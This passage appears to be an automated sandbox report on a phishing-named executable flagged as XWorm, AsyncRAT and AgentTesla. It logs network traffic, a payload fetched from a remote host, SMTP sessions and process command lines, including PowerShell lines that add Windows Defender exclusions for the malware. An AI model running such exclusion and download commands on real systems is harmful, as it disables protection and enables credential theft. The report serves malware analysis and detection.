Jun 29, 2024 10:02:26.694647074 CEST	49744	1913	192.168.2.4	209.90.234.57
Jun 29, 2024 10:02:26.694675922 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.694713116 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.694721937 CEST	49744	1913	192.168.2.4	209.90.234.57
Jun 29, 2024 10:02:26.694765091 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.694773912 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.694781065 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.694788933 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.694802999 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.694812059 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.694818974 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.694878101 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.694886923 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.694895983 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.694902897 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.694947004 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.695038080 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.695051908 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.736244917 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.736460924 CEST	49744	1913	192.168.2.4	209.90.234.57
Jun 29, 2024 10:02:26.736565113 CEST	49744	1913	192.168.2.4	209.90.234.57
Jun 29, 2024 10:02:26.736565113 CEST	49744	1913	192.168.2.4	209.90.234.57
Jun 29, 2024 10:02:26.736627102 CEST	49744	1913	192.168.2.4	209.90.234.57
Jun 29, 2024 10:02:26.741630077 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.741669893 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.741854906 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.741863966 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.741926908 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.741942883 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.742078066 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.742127895 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.742229939 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.742276907 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.742285013 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.742294073 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.742302895 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.742310047 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.742480993 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.742490053 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.742497921 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.742507935 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.742531061 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.742538929 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.742578030 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.742594004 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.742672920 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.742681980 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.742711067 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:26.784298897 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:27.409349918 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:27.411951065 CEST	49744	1913	192.168.2.4	209.90.234.57
Jun 29, 2024 10:02:27.417001963 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:27.576535940 CEST	1913	49744	209.90.234.57	192.168.2.4
Jun 29, 2024 10:02:27.616462946 CEST	49744	1913	192.168.2.4	209.90.234.57
Jun 29, 2024 10:02:27.671529055 CEST	49743	80	192.168.2.4	208.95.112.1
Jun 29, 2024 10:02:27.671807051 CEST	49737	80	192.168.2.4	107.154.156.233
Jun 29, 2024 10:02:27.671884060 CEST	49746	587	192.168.2.4	51.195.88.199
Jun 29, 2024 10:02:27.672343969 CEST	49747	587	192.168.2.4	51.195.88.199
Jun 29, 2024 10:02:27.672540903 CEST	49735	7725	192.168.2.4	195.10.205.94
Jun 29, 2024 10:02:27.672620058 CEST	49744	1913	192.168.2.4	209.90.234.57

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 29, 2024 10:02:18.320380926 CEST	63310	53	192.168.2.4	1.1.1.1
Jun 29, 2024 10:02:18.649344921 CEST	53	63310	1.1.1.1	192.168.2.4
Jun 29, 2024 10:02:18.723088980 CEST	53565	53	192.168.2.4	1.1.1.1
Jun 29, 2024 10:02:18.730237007 CEST	53	53565	1.1.1.1	192.168.2.4
Jun 29, 2024 10:02:19.355452061 CEST	50374	53	192.168.2.4	1.1.1.1
Jun 29, 2024 10:02:19.363456964 CEST	53	50374	1.1.1.1	192.168.2.4
Jun 29, 2024 10:02:20.330095053 CEST	51491	53	192.168.2.4	1.1.1.1
Jun 29, 2024 10:02:20.341355085 CEST	53	51491	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jun 29, 2024 10:02:18.320380926 CEST	192.168.2.4	1.1.1.1	0xb726	Standard query (0)	csg-app.com	A (IP address)	IN (0x0001)	false
Jun 29, 2024 10:02:18.723088980 CEST	192.168.2.4	1.1.1.1	0x82e0	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false
Jun 29, 2024 10:02:19.355452061 CEST	192.168.2.4	1.1.1.1	0x24a1	Standard query (0)	ip-api.com	A (IP address)	IN (0x0001)	false
Jun 29, 2024 10:02:20.330095053 CEST	192.168.2.4	1.1.1.1	0x4afd	Standard query (0)	s82.gocheapweb.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Jun 29, 2024 10:02:18.649344921 CEST	1.1.1.1	192.168.2.4	0xb726	No error (0)	csg-app.com	107.154.156.233	A (IP address)	IN (0x0001)	false
Jun 29, 2024 10:02:18.649344921 CEST	1.1.1.1	192.168.2.4	0xb726	No error (0)	csg-app.com	107.154.170.233	A (IP address)	IN (0x0001)	false
Jun 29, 2024 10:02:18.730237007 CEST	1.1.1.1	192.168.2.4	0x82e0	No error (0)	api.ipify.org	104.26.13.205	A (IP address)	IN (0x0001)	false
Jun 29, 2024 10:02:18.730237007 CEST	1.1.1.1	192.168.2.4	0x82e0	No error (0)	api.ipify.org	104.26.12.205	A (IP address)	IN (0x0001)	false
Jun 29, 2024 10:02:18.730237007 CEST	1.1.1.1	192.168.2.4	0x82e0	No error (0)	api.ipify.org	172.67.74.152	A (IP address)	IN (0x0001)	false
Jun 29, 2024 10:02:19.363456964 CEST	1.1.1.1	192.168.2.4	0x24a1	No error (0)	ip-api.com	208.95.112.1	A (IP address)	IN (0x0001)	false
Jun 29, 2024 10:02:20.341355085 CEST	1.1.1.1	192.168.2.4	0x4afd	No error (0)	s82.gocheapweb.com	51.195.88.199	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

api.ipify.org

csg-app.com

ip-api.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49737	107.154.156.233	80	6648	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Jun 29, 2024 10:02:18.665216923 CEST	225	OUT	GET /yak/build.exe HTTP/1.1 User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 Host: csg-app.com Connection: Keep-Alive
Jun 29, 2024 10:02:19.301197052 CEST	898	IN	HTTP/1.1 301 Moved Permanently Date: Sat, 29 Jun 2024 08:02:19 GMT Server: Apache Location: https://csg-app.com/yak/build.exe Content-Length: 241 Keep-Alive: timeout=5, max=75 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 Set-Cookie: visid_incap_2798692=uicdpyIFT7anq9DPVKqwyoq/f2YAAAAAQUIPAAAAAACWKhBwLu2FqJnR9xvRs4Sz; expires=Sun, 29 Jun 2025 07:14:13 GMT; HttpOnly; path=/; Domain=.csg-app.com Set-Cookie: incap_ses_183_2798692=HgxoOsQS/Q5G6tgVnyWKAoq/f2YAAAAAK7LZROpKFoukH2zULotCyA==; path=/; Domain=.csg-app.com X-CDN: Imperva X-Iinfo: 15-22989042-22989049 NNNN CT(80 -1 0) RT(1719648138704 92) q(0 0 1 0) r(2 2) U11 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 73 67 2d 61 70 70 2e 63 6f 6d 2f 79 61 6b 2f 62 75 69 6c 64 2e 65 78 65 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://csg-app.com/yak/build.exe">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49743	208.95.112.1	80	6648	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Jun 29, 2024 10:02:19.373331070 CEST	80	OUT	GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
Jun 29, 2024 10:02:19.841387033 CEST	175	IN	HTTP/1.1 200 OK Date: Sat, 29 Jun 2024 08:02:19 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 6 Access-Control-Allow-Origin: * X-Ttl: 60 X-Rl: 44 Data Raw: 66 61 6c 73 65 0a Data Ascii: false

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49738	104.26.13.205	443	6648	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-06-29 08:02:19 UTC	155	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 Host: api.ipify.org Connection: Keep-Alive
2024-06-29 08:02:19 UTC	211	IN	HTTP/1.1 200 OK Date: Sat, 29 Jun 2024 08:02:19 GMT Content-Type: text/plain Content-Length: 11 Connection: close Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 89b464c699ae42ca-EWR
2024-06-29 08:02:19 UTC	11	IN	Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 Data Ascii: 8.46.123.33

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49740	104.26.13.205	443	6648	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-06-29 08:02:19 UTC	155	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 Host: api.ipify.org Connection: Keep-Alive
2024-06-29 08:02:19 UTC	211	IN	HTTP/1.1 200 OK Date: Sat, 29 Jun 2024 08:02:19 GMT Content-Type: text/plain Content-Length: 11 Connection: close Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 89b464c78ab543e7-EWR
2024-06-29 08:02:19 UTC	11	IN	Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 Data Ascii: 8.46.123.33

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49741	107.154.156.233	443	6648	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-06-29 08:02:19 UTC	225	OUT	GET /yak/build.exe HTTP/1.1 User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 Host: csg-app.com Connection: Keep-Alive
2024-06-29 08:02:20 UTC	666	IN	HTTP/1.1 404 Not Found Date: Sat, 29 Jun 2024 08:02:20 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Wed, 24 Aug 2022 20:15:38 GMT Accept-Ranges: bytes Content-Length: 746 Vary: Accept-Encoding Content-Type: text/html Set-Cookie: visid_incap_2798692=uicdpyIFT7anq9DPVKqwyoq/f2YAAAAAQUIPAAAAAACWKhBwLu2FqJnR9xvRs4Sz; expires=Sun, 29 Jun 2025 07:14:13 GMT; HttpOnly; path=/; Domain=.csg-app.com Set-Cookie: incap_ses_183_2798692=gxd9X/DKeW5G6tgVnyWKAou/f2YAAAAAl1RXJ9jmCpDbeZf/GbfIaw==; path=/; Domain=.csg-app.com X-CDN: Imperva X-Iinfo: 16-27947529-27947533 NNNN CT(83 87 0) RT(1719648139346 217) q(0 0 2 0) r(3 3) U11
2024-06-29 08:02:20 UTC	746	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 69 65 3d 65 64 67 65 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 Data Ascii: <!doctype html><html lang="en"><head> <meta charset="utf-8"> <meta http-equiv="x-ua-compatible" content="ie=edge"> <title>404 Error</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="robots" content="noind

SMTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Jun 29, 2024 10:02:21.151849031 CEST	587	49745	51.195.88.199	192.168.2.4	220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Sat, 29 Jun 2024 08:02:21 +0000 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Jun 29, 2024 10:02:21.152056932 CEST	49745	587	192.168.2.4	51.195.88.199	EHLO 648351
Jun 29, 2024 10:02:21.334748030 CEST	587	49745	51.195.88.199	192.168.2.4	250-s82.gocheapweb.com Hello 648351 [8.46.123.33] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Jun 29, 2024 10:02:21.334886074 CEST	49745	587	192.168.2.4	51.195.88.199	STARTTLS
Jun 29, 2024 10:02:21.366369009 CEST	587	49746	51.195.88.199	192.168.2.4	220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Sat, 29 Jun 2024 08:02:21 +0000 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Jun 29, 2024 10:02:21.366492987 CEST	49746	587	192.168.2.4	51.195.88.199	EHLO 648351
Jun 29, 2024 10:02:21.518616915 CEST	587	49745	51.195.88.199	192.168.2.4	220 TLS go ahead
Jun 29, 2024 10:02:21.553687096 CEST	587	49746	51.195.88.199	192.168.2.4	250-s82.gocheapweb.com Hello 648351 [8.46.123.33] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Jun 29, 2024 10:02:21.553802967 CEST	49746	587	192.168.2.4	51.195.88.199	STARTTLS
Jun 29, 2024 10:02:21.741561890 CEST	587	49746	51.195.88.199	192.168.2.4	220 TLS go ahead
Jun 29, 2024 10:02:24.208687067 CEST	587	49747	51.195.88.199	192.168.2.4	220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Sat, 29 Jun 2024 08:02:24 +0000 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Jun 29, 2024 10:02:24.208858013 CEST	49747	587	192.168.2.4	51.195.88.199	EHLO 648351
Jun 29, 2024 10:02:24.393084049 CEST	587	49747	51.195.88.199	192.168.2.4	250-s82.gocheapweb.com Hello 648351 [8.46.123.33] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Jun 29, 2024 10:02:24.393208027 CEST	49747	587	192.168.2.4	51.195.88.199	STARTTLS
Jun 29, 2024 10:02:24.578058958 CEST	587	49747	51.195.88.199	192.168.2.4	220 TLS go ahead

Target ID:	0
Start time:	04:01:56
Start date:	29/06/2024
Path:	C:\Users\user\Desktop\ORDERDATASHEET#PO8738763.scr.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\ORDERDATASHEET#PO8738763.scr.exe"
Imagebase:	0x7ff7bd5f0000
File size:	2'270'208 bytes
MD5 hash:	31CBB0AD4FBFF526978C68212A36FB90
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.1646069064.000001E853C1F000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.1646069064.000001E853C1F000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.1646490262.000001E856E00000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.1646490262.000001E856E00000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	04:01:56
Start date:	29/06/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	04:01:57
Start date:	29/06/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"
Imagebase:	0x7ff7699e0000
File size:	42'064 bytes
MD5 hash:	5D4073B2EB6D217C19F2B22F21BF8D57
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	3
Start time:	04:01:57
Start date:	29/06/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"
Imagebase:	0x5c0000
File size:	45'984 bytes
MD5 hash:	9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000003.00000002.1992384164.0000000007AB0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SugarDump, Description: Yara detected SugarDump, Source: 00000003.00000002.1995905979.0000000007CF0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.1983688526.00000000073C0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.1983688526.00000000073C0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: 00000003.00000002.1983688526.00000000073C0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000003.00000002.1940827360.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000003.00000002.1940827360.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.1982834712.0000000007330000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000003.00000002.1982834712.0000000007330000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.1982834712.0000000007330000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: 00000003.00000002.1982834712.0000000007330000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.1948750396.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.1948750396.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000003.00000002.1948750396.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000003.00000002.1948750396.0000000002961000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	04:02:00
Start date:	29/06/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe'
Imagebase:	0x10000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.1694419298.0000000004F56000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	04:02:00
Start date:	29/06/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	04:02:03
Start date:	29/06/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'regsvcs.exe'
Imagebase:	0x10000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000007.00000002.1717816114.00000000050E7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	04:02:03
Start date:	29/06/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	04:02:06
Start date:	29/06/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XClient.exe'
Imagebase:	0x10000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	04:02:06
Start date:	29/06/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	04:02:10
Start date:	29/06/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
Imagebase:	0x10000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	04:02:10
Start date:	29/06/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	04:02:26
Start date:	29/06/2024
Path:	C:\Users\user\AppData\Roaming\XClient.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\XClient.exe"
Imagebase:	0xd10000
File size:	45'984 bytes
MD5 hash:	9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
